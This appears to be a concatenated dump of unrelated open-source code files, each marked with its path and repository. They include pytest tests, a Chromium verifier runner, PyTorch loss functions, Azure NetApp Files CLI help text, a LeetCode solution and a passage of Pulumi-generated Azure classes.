},
),
])
def test_check_higher_version_found(pkgs, expected_pkgs_dict):
aos_version._check_higher_version_found(pkgs, expected_pkgs_dict)
@pytest.mark.parametrize('pkgs,expected_pkgs_dict,expect_higher', [
(
[Package('spam', '3.3')],
expected_pkgs,
['spam-3.3'], # lower precision, but higher
),
(
[Package('spam', '3.2.1'), Package('eggs', '3.3.2')],
expected_pkgs,
['eggs-3.3.2'], # one too high
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')],
expected_pkgs,
['eggs-3.4'], # multiple versions, one is higher
),
(
[Package('eggs', '3.2.1'), Package('eggs', '3.4'), Package('eggs', '3.3')],
expected_pkgs,
['eggs-3.4'], # multiple versions, two are higher
),
(
[Package('ovs', '2.8')],
{
"ovs": {
"name": "ovs",
"version": ["2.6", "2.7"],
"check_multi": False,
}
},
['ovs-2.8'],
),
])
def test_check_higher_version_found_fail(pkgs, expected_pkgs_dict, expect_higher):
with pytest.raises(aos_version.FoundHigherVersion) as e:
aos_version._check_higher_version_found(pkgs, expected_pkgs_dict)
assert set(expect_higher) == set(e.value.problem_pkgs)
@pytest.mark.parametrize('pkgs', [
[],
[Package('spam', '3.2.1')],
[Package('spam', '3.2.1'), Package('eggs', '3.2.2')],
])
def test_check_multi_minor_release(pkgs):
aos_version._check_multi_minor_release(pkgs, expected_pkgs)
@pytest.mark.parametrize('pkgs,expect_to_flag_pkgs', [
(
[Package('spam', '3.2.1'), Package('spam', '3.3.2')],
['spam'],
),
(
[Package('eggs', '1.2.3'), Package('eggs', '3.2.1.5'), Package('eggs', '3.4')],
['eggs'],
),
])
def test_check_multi_minor_release_fail(pkgs, expect_to_flag_pkgs):
with pytest.raises(aos_version.FoundMultiRelease) as e:
aos_version._check_multi_minor_release(pkgs, expected_pkgs)
assert set(expect_to_flag_pkgs) == set(e.value.problem_pkgs)
|
chrome/test/mini_installer/verifier_runner.py
|
kjthegod/chromium
| 2,151 |
61555
|
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import file_verifier
import process_verifier
import registry_verifier
class VerifierRunner:
"""Runs all Verifiers."""
def __init__(self):
"""Constructor."""
# TODO(sukolsak): Implement other verifiers
self._verifiers = {
'Files': file_verifier.FileVerifier(),
'Processes': process_verifier.ProcessVerifier(),
'RegistryEntries': registry_verifier.RegistryVerifier(),
}
def VerifyAll(self, property, variable_expander):
"""Verifies that the current machine states match the property dictionary.
A property dictionary is a dictionary where each key is a verifier's name
and the associated value is the input to that verifier. For details about
the input format for each verifier, take a look at http://goo.gl/1P85WL
Args:
property: A property dictionary.
variable_expander: A VariableExpander object.
"""
for verifier_name, verifier_input in property.iteritems():
if verifier_name not in self._verifiers:
raise KeyError('Unknown verifier %s' % verifier_name)
self._verifiers[verifier_name].VerifyInput(verifier_input,
variable_expander)
|
src/quicknlp/callbacks.py
|
jalajthanaki/quick-nlp
| 287 |
61563
|
from fastai.sgdr import Callback
class CVAELossCallback(Callback):
pass
|
modules/functional/loss.py
|
Masterchef365/pvcnn
| 477 |
61564
|
import torch
import torch.nn.functional as F
__all__ = ['kl_loss', 'huber_loss']
def kl_loss(x, y):
x = F.softmax(x.detach(), dim=1)
y = F.log_softmax(y, dim=1)
return torch.mean(torch.sum(x * (torch.log(x) - y), dim=1))
def huber_loss(error, delta):
abs_error = torch.abs(error)
quadratic = torch.min(abs_error, torch.full_like(abs_error, fill_value=delta))
losses = 0.5 * (quadratic ** 2) + delta * (abs_error - quadratic)
return torch.mean(losses)
|
src/genie/libs/parser/iosxe/tests/ShowPlatformHardwareQfpStatisticsDrop/cli/equal/golden_output_active_expected.py
|
balmasea/genieparser
| 204 |
61635
|
<reponame>balmasea/genieparser
expected_output = {
"global_drop_stats": {
"Ipv4NoAdj": {"octets": 296, "packets": 7},
"Ipv4NoRoute": {"octets": 7964, "packets": 181},
"PuntPerCausePolicerDrops": {"octets": 184230, "packets": 2003},
"UidbNotCfgd": {"octets": 29312827, "packets": 466391},
"UnconfiguredIpv4Fia": {"octets": 360, "packets": 6},
}
}
|
generator/transformers/common_producer.py
|
jordynmackool/sdl_java_suite
| 138 |
61644
|
<reponame>jordynmackool/sdl_java_suite<gh_stars>100-1000
"""
Common transformation
"""
import logging
import re
from abc import ABC
from collections import namedtuple, OrderedDict
from model.array import Array
from model.enum import Enum
from model.struct import Struct
class InterfaceProducerCommon(ABC):
"""
Common transformation
"""
version = '1.0.0'
def __init__(self, container_name, enums_package, structs_package, package_name,
enum_names=(), struct_names=(), key_words=()):
self.logger = logging.getLogger('Generator.InterfaceProducerCommon')
self.container_name = container_name
self.enum_names = enum_names
self.struct_names = struct_names
self.key_words = key_words
self.enums_package = enums_package
self.structs_package = structs_package
self.package_name = package_name
self._params = namedtuple('params', 'deprecated description key last mandatory origin return_type since title '
'param_doc name')
@property
def get_version(self):
return self.version
@property
def params(self):
"""
:return: namedtuple params(name='', origin='')
"""
return self._params
@staticmethod
def key(param: str):
"""
Convert param string to uppercase and inserting underscores
:param param: camel case string
:return: string in uppercase with underscores
"""
if re.match(r'^[A-Z_\d]+$', param):
return param
else:
result = re.sub(r'([a-z]|[A-Z]{2,})([A-Z]|\d$)', r'\1_\2', param).upper()
result = re.sub('IDPARAM', 'ID_PARAM', result)
return result
@staticmethod
def ending_cutter(n: str):
"""
If string not contains only uppercase letters and end with 'ID' deleting 'ID' from end of string
:param n: string to evaluate and deleting 'ID' from end of string
:return: if match cut string else original string
"""
if re.match(r'^\w+[a-z]+([A-Z]{2,})?ID$', n):
return n[:-2]
else:
return n
@staticmethod
def extract_description(d):
"""
Extract description
:param d: list with description
:return: evaluated string
"""
return re.sub(r'(\s{2,}|\n)', ' ', ''.join(d)).strip() if d else ''
@staticmethod
def extract_values(param):
p = OrderedDict()
if hasattr(param.param_type, 'min_size'):
p['array_min_size'] = param.param_type.min_size
if hasattr(param.param_type, 'max_size'):
p['array_max_size'] = param.param_type.max_size
if hasattr(param, 'default_value'):
if hasattr(param.default_value, 'name'):
p['default_value'] = param.default_value.name
else:
p['default_value'] = param.default_value
elif hasattr(param.param_type, 'default_value'):
if hasattr(param.param_type.default_value, 'name'):
p['default_value'] = param.param_type.default_value.name
else:
p['default_value'] = param.param_type.default_value
if hasattr(param.param_type, 'min_value'):
p['num_min_value'] = param.param_type.min_value
elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'min_value'):
p['num_min_value'] = param.param_type.element_type.min_value
if hasattr(param.param_type, 'max_value'):
p['num_max_value'] = param.param_type.max_value
elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'max_value'):
p['num_max_value'] = param.param_type.element_type.max_value
if hasattr(param.param_type, 'min_length'):
p['string_min_length'] = param.param_type.min_length
elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'min_length'):
p['string_min_length'] = param.param_type.element_type.min_length
if hasattr(param.param_type, 'max_length'):
p['string_max_length'] = param.param_type.max_length
elif hasattr(param.param_type, 'element_type') and hasattr(param.param_type.element_type, 'max_length'):
p['string_max_length'] = param.param_type.element_type.max_length
# Filter None values
filtered_values = {k: v for k, v in p.items() if v is not None}
return filtered_values
@staticmethod
def replace_sync(name):
"""
:param name: string with item name
:return: string with replaced 'sync' to 'Sdl'
"""
if name:
return re.sub(r'^([sS])ync(.+)$', r'\1dl\2', name)
return name
def replace_keywords(self, name: str = '') -> str:
"""
if :param name in self.key_words, :return: name += 'Param'
:param name: string with item name
"""
if any(map(lambda k: re.search(r'^(get|set|key_)?{}$'.format(name.casefold()), k), self.key_words)):
origin = name
if name.isupper():
name += '_PARAM'
else:
name += 'Param'
self.logger.debug('Replacing %s with %s', origin, name)
return self.replace_sync(name)
def extract_type(self, param):
"""
Evaluate and extract type
:param param: sub-element Param of element from initial Model
:return: string with sub-element type
"""
def evaluate(t1):
if isinstance(t1, Struct) or isinstance(t1, Enum):
name = t1.name
return name
else:
return type(t1).__name__
if isinstance(param.param_type, Array):
return 'List<{}>'.format(evaluate(param.param_type.element_type))
else:
return evaluate(param.param_type)
|
tests/sample7args.py
|
anki-code/python-hunter
| 707 |
61645
|
from __future__ import print_function
def one(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # one
a = b = c['side'] = 'effect'
two()
def two(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # two
a = b = c['side'] = 'effect'
three()
def three(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # three
a = b = c['side'] = 'effect'
four()
def four(a=123, b='234', c={'3': [4, '5']}):
for i in range(1): # four
a = b = c['side'] = 'effect'
five()
def five(a=123, b='234', c={'3': [4, '5']}):
six()
six()
six()
a = b = c['side'] = in_five = 'effect'
for i in range(1): # five
return i # five
def six():
pass
if __name__ == "__main__":
from hunter import *
from utils import DebugCallPrinter
trace(
Backlog(stack=15, vars=True, action=DebugCallPrinter(' [' 'backlog' ']'), function='five').filter(~Q(function='six')),
action=DebugCallPrinter
)
one()
one() # make sure Backlog is reusable (doesn't have storage side-effects)
stop()
|
test/com/facebook/buck/cli/testdata/run-command/cmd/echo_var.py
|
Unknoob/buck
| 8,027 |
61670
|
from __future__ import absolute_import, division, print_function, unicode_literals
import os
print("VAR is '{}'".format(os.environ["VAR"]))
|
src/chapter-4/test_ids.py
|
luizyao/pytest-chinese-doc
| 283 |
61699
|
<gh_stars>100-1000
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
'''
Author: <NAME> (<EMAIL>)
Created Date: 2019-10-04 7:05:16
-----
Last Modified: 2019-10-04 7:29:59
Modified By: <NAME> (<EMAIL>)
-----
THIS PROGRAM IS FREE SOFTWARE, IS LICENSED UNDER MIT.
A short and simple permissive license with conditions
only requiring preservation of copyright and license notices.
Copyright © 2019 <NAME>
-----
HISTORY:
Date By Comments
---------- -------- ---------------------------------------------------------
'''
import pytest
@pytest.fixture(params=[0, 1], ids=['spam', 'ham'])
def a(request):
return request.param
def test_a(a):
pass
def idfn(fixture_value):
if fixture_value == 0:
return "eggs"
elif fixture_value == 1:
return False
elif fixture_value == 2:
return None
else:
return fixture_value
@pytest.fixture(params=[0, 1, 2, 3], ids=idfn)
def b(request):
return request.param
def test_b(b):
pass
class C:
pass
@pytest.fixture(params=[(1, 2), {'d': 1}, C()])
def c(request):
return request.param
def test_c(c):
pass
|
src/netappfiles-preview/azext_netappfiles_preview/_help.py
|
Mannan2812/azure-cli-extensions
| 207 |
61751
|
<filename>src/netappfiles-preview/azext_netappfiles_preview/_help.py
# coding=utf-8
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from knack.help_files import helps
# pylint: disable=line-too-long
helps['netappfiles'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Resources.
"""
# account
helps['netappfiles account'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Account Resources.
"""
helps['netappfiles account create'] = """
type: command
short-summary: Create a new Azure NetApp Files (ANF) account. Note that active directory can only be applied to an existing account (using set/update).
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the account
examples:
- name: Create an ANF account
text: >
az netappfiles account create -g group --account-name name -l location
"""
helps['netappfiles account set'] = """
type: command
short-summary: Sets the tags or the active directory details for a specified ANF account. Sets the active directory property to exactly what is provided. If none is provided then the active directory is removed, i.e. provide empty [].
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the account
- name: --active-directories
type: string
short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory)
examples:
- name: Update the tags and active directory of an ANF account
text: >
az netappfiles account set -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2
- name: Remove the active directory from the ANF account
text: >
az netappfiles account set -g group --account-name name --active-directories '[]' -l westus2
"""
helps['netappfiles account update'] = """
type: command
short-summary: Set/modify the tags or the active directory details for a specified ANF account. Active directory settings are appended only - if none are present no change is made otherwise the active directory is replaced with that provided.
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the account
- name: --active-directories
type: string
short-summary: An array of active directory (AD) settings in json format. Limitation one AD/subscription. Consists of the fields username (Username of Active Directory domain administrator), password (Plain text password of Active Directory domain administrator), domain (Name of the Active Directory domain), dns (Comma separated list of DNS server IP addresses for the Active Directory domain), smb_server_name (NetBIOS name of the SMB server. This name will be registered as a computer account in the AD and used to mount volumes. Must be 10 characters or less), organizational_unit (The Organizational Unit (OU) within the Windows Active Directory)
examples:
- name: Update the tags and active directory of an ANF account
text: >
az netappfiles account update -g group --account-name name --tags 'key[=value] key[=value]' --active-directories '[{"username": "aduser", "password": "<PASSWORD>", "smbservername": "SMBSERVER", "dns": "192.168.3.11", "domain": "westcentralus"}]' -l westus2
"""
helps['netappfiles account delete'] = """
type: command
short-summary: Delete the specified ANF account.
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
examples:
- name: Delete an ANF account
text: >
az netappfiles account delete -g group --account-name name
"""
helps['netappfiles account list'] = """
type: command
short-summary: List ANF accounts.
examples:
- name: List ANF accounts within a resource group
text: >
az netappfiles account list -g group
"""
helps['netappfiles account show'] = """
type: command
short-summary: Get the specified ANF account.
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
examples:
- name: Get an ANF account
text: >
az netappfiles account show -g group --account-name name
"""
# pools
helps['netappfiles pool'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Pool Resources.
"""
helps['netappfiles pool create'] = """
type: command
short-summary: Create a new Azure NetApp Files (ANF) pool.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -n -p
type: string
short-summary: The name of the ANF pool
- name: --size
type: integer
short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes
- name: --service-level
type: string
short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"]
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the pool
examples:
- name: Create an ANF pool
text: >
az netappfiles pool create -g group --account-name aname --pool-name pname -l location --size 4398046511104 --service-level "Premium"
"""
helps['netappfiles pool update'] = """
type: command
short-summary: Update the tags of the specified ANF pool.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -n -p
type: string
short-summary: The name of the ANF pool
- name: --size
type: integer
short-summary: The size for the ANF pool. Must be in 4 tebibytes increments, expressed in bytes
- name: --service-level
type: string
short-summary: The service level for the ANF pool ["Standard"|"Premium"|"Extreme"]
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the pool
examples:
- name: Update specific values for an ANF pool
text: >
az netappfiles pool update -g group --account-name aname --pool-name pname --service-level "Extreme" --tags 'key[=value] key[=value]'
"""
helps['netappfiles pool delete'] = """
type: command
short-summary: Delete the specified ANF pool.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -n -p
type: string
short-summary: The name of the ANF pool
examples:
- name: Delete an ANF pool
text: >
az netappfiles pool delete -g group --account-name aname --pool-name pname
"""
helps['netappfiles pool list'] = """
type: command
short-summary: L:ist the ANF pools for the specified account.
parameters:
- name: --account-name -a -n
type: string
short-summary: The name of the ANF account
examples:
- name: List the pools for the ANF account
text: >
az netappfiles pool list -g group --account-name name
"""
helps['netappfiles pool show'] = """
type: command
short-summary: Get the specified ANF pool.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -n -p
type: string
short-summary: The name of the ANF pool
examples:
- name: Get an ANF pool
text: >
az netappfiles pool show -g group --account-name aname --pool-name pname
"""
# volumes
helps['netappfiles volume'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Volume Resources.
"""
helps['netappfiles volume create'] = """
type: command
short-summary: Create a new Azure NetApp Files (ANF) volume.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -n -v
type: string
short-summary: The name of the ANF volume
- name: --service-level
type: string
short-summary: The service level ["Standard"|"Premium"|"Extreme"]
- name: --usage-threshold
type: int
short-summary: The maximum storage quota allowed for a file system in bytes. Min 100 GiB, max 100TiB"
- name: --creation-token
type: string
short-summary: A unique file path identifier, from 1 to 80 characters
- name: --subnet-id
type: string
short-summary: The subnet identifier
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the volume
- name: --export-policy
type: string
short-summary: A json list of the parameters for export policy containing rule_index (Order index), unix_read_only (Read only access), unix_read_write (Read and write access), cifs (Allows CIFS protocol), nfsv3 (Allows NFSv3 protocol), nfsv4 (Allows NFSv4 protocol) and allowedClients (Client ingress specification as comma separated string with IPv4 CIDRs, IPv4 host addresses and host names)
examples:
- name: Create an ANF volume
text: >
az netappfiles volume create -g group --account-name aname --pool-name pname --volume-name vname -l location --service-level "Premium" --usage-threshold 107374182400 --creation-token "<PASSWORD>" --subnet-id "/subscriptions/mysubsid/resourceGroups/myrg/providers/Microsoft.Network/virtualNetworks/myvnet/subnets/default" --export-policy '[{"allowed_clients":"0.0.0.0/0", "rule_index": "1", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}]'
"""
helps['netappfiles volume update'] = """
type: command
short-summary: Update the specified ANF volume with the values provided. Unspecified values will remain unchanged.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -n -v
type: string
short-summary: The name of the ANF volume
- name: --service-level
type: string
short-summary: The service level ["Standard"|"Premium"|"Extreme"]
- name: --usage-threshold
type: int
short-summary: The maximum storage quota allowed for a file system in bytes. Min 100 GiB, max 100TiB"
- name: --tags
type: string
short-summary: A list of space separated tags to apply to the volume
- name: --export-policy
type: string
short-summary: A json list of the parameters for export policy containing rule_index (Order index), unix_read_only (Read only access), unix_read_write (Read and write access), cifs (Allows CIFS protocol), nfsv3 (Allows NFSv3 protocol), nfsv4 (Allows NFSv4 protocol) and allowedClients (Client ingress specification as comma separated string with IPv4 CIDRs, IPv4 host addresses and host names)
examples:
- name: Create an ANF volume
text: >
az netappfiles volume update -g group --account-name aname --pool-name pname --volume-name vname --service-level level --usage-threshold 107374182400 --tags 'key[=value] key[=value]' --export-policy '[{"allowed_clients":"1.2.3.0/24", "rule_index": "1", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}, {"allowed_clients":"1.2.4.0/24", "rule_index": "2", "unix_read_only": "true", "unix_read_write": "false", "cifs": "false", "nfsv3": "true", "nfsv3": "true", "nfsv4": "false"}]'
"""
helps['netappfiles volume delete'] = """
type: command
short-summary: Delete the specified ANF volume.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -n -v
type: string
short-summary: The name of the ANF volume
examples:
- name: Delete an ANF volume
text: >
az netappfiles volume delete -g group --account-name aname --pool-name pname --volume-name vname
"""
helps['netappfiles volume list'] = """
type: command
short-summary: List the ANF Pools for the specified account.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -n -p
type: string
short-summary: The name of the ANF pool
examples:
- name: List the ANF volumes of the pool
text: >
az netappfiles volume list -g group --account-name aname --pool-name pname
"""
helps['netappfiles volume show'] = """
type: command
short-summary: Get the specified ANF volume.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -n -v
type: string
short-summary: The name of the ANF pool
examples:
- name: Returns the properties of the given ANF volume
text: >
az netappfiles volume show -g group --account-name aname --pool-name pname --volume-name vname
"""
# mounttargets
helps['netappfiles mount-target'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Mount Target Resources.
"""
helps['netappfiles mount-target list'] = """
type: command
short-summary: List the mount targets of an ANF volume.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -v
type: string
short-summary: The name of the ANF pool
examples:
- name: list the mount targets of an ANF volume
text: >
az netappfiles mount-target list -g group --account-name aname --pool-name pname --volume-name vname
"""
# snapshots
helps['netappfiles snapshot'] = """
type: group
short-summary: Manage Azure NetApp Files (ANF) Snapshot Resources.
"""
helps['netappfiles snapshot create'] = """
type: command
short-summary: Create a new Azure NetApp Files (ANF) snapshot.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -v
type: string
short-summary: The name of the ANF volume
- name: --snapshot-name -n -s
type: string
short-summary: The name of the ANF snapshot
- name: --file-system-id
type: string
short-summary: The uuid of the volume
examples:
- name: Create an ANF snapshot
text: >
az netappfiles snapshot create -g group --account-name account-name --pool-name pname --volume-name vname --snapshot-name sname -l location --file-system-id volume-uuid
"""
helps['netappfiles snapshot delete'] = """
type: command
short-summary: Delete the specified ANF snapshot.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -v
type: string
short-summary: The name of the ANF volume
- name: --snapshot-name -n -s
type: string
short-summary: The name of the ANF snapshot
examples:
- name: Delete an ANF snapshot
text: >
az netappfiles snapshot delete -g group --account-name aname --pool-name pname --volume-name vname --snapshot-name sname
"""
helps['netappfiles snapshot list'] = """
type: command
short-summary: List the snapshots of an ANF volume.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -n -v
type: string
short-summary: The name of the ANF volume
examples:
- name: list the snapshots of an ANF volume
text: >
az netappfiles snapshot list -g group --account-name aname --pool-name pname --volume-name vname
"""
helps['netappfiles snapshot show'] = """
type: command
short-summary: Get the specified ANF snapshot.
parameters:
- name: --account-name -a
type: string
short-summary: The name of the ANF account
- name: --pool-name -p
type: string
short-summary: The name of the ANF pool
- name: --volume-name -v
type: string
short-summary: The name of the ANF volume
- name: --snapshot-name -n -s
type: string
short-summary: The name of the ANF snapshot
examples:
- name: Return the specified ANF snapshot
text: >
az netappfiles snapshot show -g group --account-name aname --pool-name pname --volume-name vname --snapshot-name sname
"""
|
coding_interviews/leetcode/easy/lucky_numbers_in_a_matrix/lucky_numbers_in_a_matrix.py
|
LeandroTk/Algorithms
| 205 |
61779
|
<gh_stars>100-1000
# https://leetcode.com/problems/lucky-numbers-in-a-matrix
def lucky_numbers(matrix):
all_lucky_numbers, all_mins = [], []
for row in matrix:
found_min, col_index = float('Inf'), -1
for index, column in enumerate(row):
if column < found_min:
found_min = column
col_index = index
all_mins.append([found_min, col_index])
for a_min in all_mins:
[min_value, min_column] = a_min
maximum = float('-Inf')
for index in range(len(matrix)):
num = matrix[index][min_column]
maximum = max(num, maximum)
if maximum == min_value:
all_lucky_numbers.append(min_value)
return all_lucky_numbers
|
sdk/python/pulumi_azure/domainservices/outputs.py
|
henriktao/pulumi-azure
| 109 |
61800
|
<gh_stars>100-1000
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'ServiceInitialReplicaSet',
'ServiceNotifications',
'ServiceSecureLdap',
'ServiceSecurity',
'GetServiceNotificationResult',
'GetServiceReplicaSetResult',
'GetServiceSecureLdapResult',
'GetServiceSecurityResult',
]
@pulumi.output_type
class ServiceInitialReplicaSet(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "subnetId":
suggest = "subnet_id"
elif key == "domainControllerIpAddresses":
suggest = "domain_controller_ip_addresses"
elif key == "externalAccessIpAddress":
suggest = "external_access_ip_address"
elif key == "serviceStatus":
suggest = "service_status"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceInitialReplicaSet. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceInitialReplicaSet.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceInitialReplicaSet.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
subnet_id: str,
domain_controller_ip_addresses: Optional[Sequence[str]] = None,
external_access_ip_address: Optional[str] = None,
id: Optional[str] = None,
location: Optional[str] = None,
service_status: Optional[str] = None):
"""
:param str subnet_id: The ID of the subnet in which to place the initial replica set.
:param Sequence[str] domain_controller_ip_addresses: A list of subnet IP addresses for the domain controllers in the initial replica set, typically two.
:param str external_access_ip_address: The publicly routable IP address for the domain controllers in the initial replica set.
:param str id: The ID of the Domain Service.
:param str location: The Azure location where the Domain Service exists. Changing this forces a new resource to be created.
:param str service_status: The current service status for the initial replica set.
"""
pulumi.set(__self__, "subnet_id", subnet_id)
if domain_controller_ip_addresses is not None:
pulumi.set(__self__, "domain_controller_ip_addresses", domain_controller_ip_addresses)
if external_access_ip_address is not None:
pulumi.set(__self__, "external_access_ip_address", external_access_ip_address)
if id is not None:
pulumi.set(__self__, "id", id)
if location is not None:
pulumi.set(__self__, "location", location)
if service_status is not None:
pulumi.set(__self__, "service_status", service_status)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> str:
"""
The ID of the subnet in which to place the initial replica set.
"""
return pulumi.get(self, "subnet_id")
@property
@pulumi.getter(name="domainControllerIpAddresses")
def domain_controller_ip_addresses(self) -> Optional[Sequence[str]]:
"""
A list of subnet IP addresses for the domain controllers in the initial replica set, typically two.
"""
return pulumi.get(self, "domain_controller_ip_addresses")
@property
@pulumi.getter(name="externalAccessIpAddress")
def external_access_ip_address(self) -> Optional[str]:
"""
The publicly routable IP address for the domain controllers in the initial replica set.
"""
return pulumi.get(self, "external_access_ip_address")
@property
@pulumi.getter
def id(self) -> Optional[str]:
"""
The ID of the Domain Service.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
The Azure location where the Domain Service exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="serviceStatus")
def service_status(self) -> Optional[str]:
"""
The current service status for the initial replica set.
"""
return pulumi.get(self, "service_status")
@pulumi.output_type
class ServiceNotifications(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "additionalRecipients":
suggest = "additional_recipients"
elif key == "notifyDcAdmins":
suggest = "notify_dc_admins"
elif key == "notifyGlobalAdmins":
suggest = "notify_global_admins"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceNotifications. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceNotifications.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceNotifications.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
additional_recipients: Optional[Sequence[str]] = None,
notify_dc_admins: Optional[bool] = None,
notify_global_admins: Optional[bool] = None):
"""
:param Sequence[str] additional_recipients: A list of additional email addresses to notify when there are alerts in the managed domain.
:param bool notify_dc_admins: Whether to notify members of the _AAD DC Administrators_ group when there are alerts in the managed domain.
:param bool notify_global_admins: Whether to notify all Global Administrators when there are alerts in the managed domain.
"""
if additional_recipients is not None:
pulumi.set(__self__, "additional_recipients", additional_recipients)
if notify_dc_admins is not None:
pulumi.set(__self__, "notify_dc_admins", notify_dc_admins)
if notify_global_admins is not None:
pulumi.set(__self__, "notify_global_admins", notify_global_admins)
@property
@pulumi.getter(name="additionalRecipients")
def additional_recipients(self) -> Optional[Sequence[str]]:
"""
A list of additional email addresses to notify when there are alerts in the managed domain.
"""
return pulumi.get(self, "additional_recipients")
@property
@pulumi.getter(name="notifyDcAdmins")
def notify_dc_admins(self) -> Optional[bool]:
"""
Whether to notify members of the _AAD DC Administrators_ group when there are alerts in the managed domain.
"""
return pulumi.get(self, "notify_dc_admins")
@property
@pulumi.getter(name="notifyGlobalAdmins")
def notify_global_admins(self) -> Optional[bool]:
"""
Whether to notify all Global Administrators when there are alerts in the managed domain.
"""
return pulumi.get(self, "notify_global_admins")
@pulumi.output_type
class ServiceSecureLdap(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "pfxCertificate":
suggest = "pfx_certificate"
elif key == "pfxCertificatePassword":
suggest = "pfx_certificate_password"
elif key == "certificateExpiry":
suggest = "certificate_expiry"
elif key == "certificateThumbprint":
suggest = "certificate_thumbprint"
elif key == "externalAccessEnabled":
suggest = "external_access_enabled"
elif key == "publicCertificate":
suggest = "public_certificate"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ServiceSecureLdap. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ServiceSecureLdap.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ServiceSecureLdap.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
enabled: bool,
pfx_certificate: str,
pfx_certificate_password: str,
certificate_expiry: Optional[str] = None,
certificate_thumbprint: Optional[str] = None,
